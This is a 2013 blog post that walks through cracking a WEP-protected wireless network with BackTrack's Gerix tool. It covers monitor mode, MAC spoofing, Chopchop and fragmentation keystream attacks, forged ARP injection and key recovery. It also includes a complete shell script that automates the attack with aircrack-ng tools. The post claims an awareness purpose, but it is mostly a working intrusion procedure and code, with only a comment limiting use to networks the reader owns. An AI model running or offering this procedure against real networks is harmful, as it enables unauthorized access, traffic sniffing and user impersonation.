Thursday, July 11, 2013

Cracking WEP wireless network


     Wireless encryption matters, but most people I’ve come across never give it a second thought. They assume nobody will bother hacking them because they are just ordinary people. But we regular folks are exactly who attackers go after: compromised home machines are disposable footholds for larger goals. This post is the first of a 3 part series that demonstrates how to get into a wireless network protected with WEP encryption, sniff its traffic, and then use the collected data to impersonate a user. The goal is to raise awareness of how vulnerable wireless connections are.

     There are hundreds of articles online that will teach you how to crack a wireless network. Now there is another one.

1) Download the BackTrack ISO, burn it to a CD, and boot from the disc.
       You don’t need to install BackTrack; running it live from the disc is enough, but you can install it
       I will be using BT5R3-GNOME-32 for this demonstration
2) Once it has booted (or been installed), log in and start the GUI
       The default user name is root and the password is toor
       Type startx to start the GUI
3) The tool we will use is Gerix
       Navigate to: Applications, BackTrack, Exploitation Tools, WLAN Exploitation, gerix-wifi-cracker-ng


4) Click the Configuration tab and highlight your wireless adapter (wlan0) listed under Interface
       If no adapter is present, refer to the notes at the end of this article
5) Click Enable/Disable Monitor Mode to create a new monitor-mode interface (mon0)
       Highlight mon0 and set a random MAC address, so the frames you inject do not carry your adapter’s real hardware address


6) Scroll down and click Rescan Networks
       Once the networks appear, select one from the list that uses WEP encryption and has decent signal strength; with a weak signal many of the frames you inject will be lost


7) Navigate to the WEP tab and click Start Sniffing
       A box will appear; move it aside but don’t close it, it is the capture process
          The number below #Data is what we are watching: every captured data frame carries a 24-bit initialization vector (IV), and the cracking attack needs a large number of them
          The more traffic on the network the faster it climbs, but we can also inject frames to make the AP generate traffic


If no one is using the network you will have to generate the traffic yourself. Click Test Injection first: it checks that your adapter can inject frames and that the AP answers them (it says nothing about whether the AP is vulnerable; every WEP network is).

8) Try a Chopchop attack first: it recovers the keystream for one captured frame. Then create an ARP packet encrypted with that keystream and inject the created ARP packet
       Another window will pop up and ask whether you want to inject the created packet; type Y and hit enter
       The AP relays every injected ARP request, encrypting each copy with a fresh IV, so #Data climbs quickly (try the fragmentation attack instead if Chopchop doesn’t work)


9) Once #Data reaches at least 5,000, try to crack the key
       Click on the Cracking tab and click on Decrypt WEP password


     Another window will pop up and display the key when the attack succeeds


If you don’t have enough IVs the attack simply fails; keep sniffing and injecting, and click Decrypt WEP password again when #Data has grown (10,000, then 15,000). A 128-bit key can take noticeably more IVs than a 64-bit one.
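For readers who would rather see what the clicks above actually run, here is the same procedure (steps 4 to 9) as the aircrack-ng commands Gerix wraps. This is an added example, not code from the original post or from the Gerix project. It assumes the BackTrack 5 R3 tooling (airmon-ng, airodump-ng, aireplay-ng, packetforge-ng, aircrack-ng, macchanger), an adapter whose driver supports injection, and placeholder values for the target BSSID, ESSID and channel; the CSV sample inside it is constructed in airodump-ng’s CSV layout so that the #Data parsing can be exercised without an adapter.

```shell
#!/bin/sh
# Added example (not code from the original post): the aircrack-ng commands behind
# the Gerix clicks in steps 4-9. Assumes BackTrack 5 R3 (aircrack-ng 1.1, macchanger)
# and an adapter whose driver supports injection. BSSID/ESSID/channel below are
# placeholders for a network you own.  Real run:  WEP_RUN=1 BSSID=.. ESSID=.. CHANNEL=.. sh wep.sh
# DRY_RUN=1 prints the commands instead of executing them.

: "${DRY_RUN:=0}"
: "${IFACE:=wlan0}"
: "${MON:=mon0}"
: "${BSSID:=00:14:6C:7E:40:80}"   # placeholder target
: "${ESSID:=lab01}"               # placeholder
: "${CHANNEL:=6}"
: "${PREFIX:=capture}"            # airodump-ng writes $PREFIX-01.cap / $PREFIX-01.csv
: "${MIN_IVS:=5000}"              # the post's first attempt; 128-bit keys usually need far more

run() {  # execute a command, or only print it when DRY_RUN=1
  if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

run_bg() {  # same, but leave the command running; prints its PID, output goes to <command>.log
  if [ "$DRY_RUN" = 1 ]; then printf '%s &\n' "$*" >&2; return; fi
  "$@" > "$1.log" 2>&1 &
  echo $!
}

random_mac() {  # step 5: a random locally administered unicast MAC, 02:xx:xx:xx:xx:xx
  printf '02:%02x:%02x:%02x:%02x:%02x\n' $(od -An -N5 -tu1 /dev/urandom)
}

iv_count() {  # $1 = airodump-ng CSV, $2 = BSSID: print the "# IV" column, which is Gerix's #Data
  awk -F', ' -v b="$(printf '%s' "$2" | tr 'a-f' 'A-F')" \
      '$1 == b { gsub(/ /, "", $11); print $11 }' "$1"
}

sample_csv() {  # constructed sample in airodump-ng's CSV layout, to exercise iv_count offline
  cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2013-07-11 10:00:00, 2013-07-11 10:05:12,  6,  54, WEP , WEP, OPN, -45,      300,     5123,   0.  0.  0.  0,   5, lab01, 
EOF
}

monitor_mode() {  # steps 4-5: put the adapter in monitor mode and randomise mon0's MAC
  run airmon-ng start "$IFACE"
  OURMAC=$(random_mac)
  run ifconfig "$MON" down
  run macchanger -m "$OURMAC" "$MON"
  run ifconfig "$MON" up
}

test_injection() {  # step 7 "test injection": checks OUR adapter can inject and the AP answers
  run aireplay-ng -9 -e "$ESSID" -a "$BSSID" "$MON"
}

associate() {  # the AP discards frames from unassociated clients, so fake-authenticate first
  run aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$OURMAC" "$MON"
}

recover_keystream() {  # step 8: chopchop (-4) first, fragmentation (-5) as fallback; sets XOR
  run aireplay-ng -4 -b "$BSSID" -h "$OURMAC" "$MON" ||
    run aireplay-ng -5 -b "$BSSID" -h "$OURMAC" "$MON"
  XOR=$(ls -1t replay_dec-*.xor fragment-*.xor 2>/dev/null | head -n 1)
  XOR=${XOR:-keystream.xor}   # placeholder name when nothing was captured (dry-run)
}

forge_arp() {  # step 8: encrypt a broadcast ARP request with the recovered keystream ($1 = .xor file)
  run packetforge-ng -0 -a "$BSSID" -h "$OURMAC" -k 255.255.255.255 -l 255.255.255.255 \
      -y "$1" -w arp-request
}

crack() {  # step 9: retry whenever #Data has grown, as the post says to do
  while :; do
    csv=$(ls -1 "$PREFIX"-*.csv 2>/dev/null | tail -n 1)
    n=$(iv_count "${csv:-/dev/null}" "$BSSID")
    if [ "${n:-0}" -ge "$MIN_IVS" ] &&
       run aircrack-ng -b "$BSSID" "$PREFIX"-*.cap | grep 'KEY FOUND'; then
      return 0
    fi
    sleep 30
  done
}

main() {
  monitor_mode
  CAPTURE_PID=$(run_bg airodump-ng -c "$CHANNEL" --bssid "$BSSID" -w "$PREFIX" "$MON")
  sleep 5; test_injection; associate
  recover_keystream; forge_arp "$XOR"
  INJECT_PID=$(run_bg aireplay-ng -2 -F -r arp-request "$MON")   # -F answers the "Use this packet?" prompt
  crack
  kill $CAPTURE_PID $INJECT_PID 2>/dev/null
}

if [ "${WEP_RUN:-0}" = 1 ]; then main; fi
```

The live airodump-ng screen that Gerix shows in its pop-up box goes to airodump-ng.log here; the script reads #Data from the CSV file airodump-ng writes instead, which is the same "# IV" column. Running it with DRY_RUN=1 and no WEP_RUN shows nothing, because every step is a function; DRY_RUN=1 WEP_RUN=1 prints the full command sequence without touching the adapter.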


     Gerix is just a GUI front-end for the aircrack-ng suite. For full functionality (in particular injection) your wireless adapter’s chipset and driver must support packet injection. The list of supported chipsets can be found here; the page has not been modified since 2011, so there are probably more supported chipsets on the market by now.

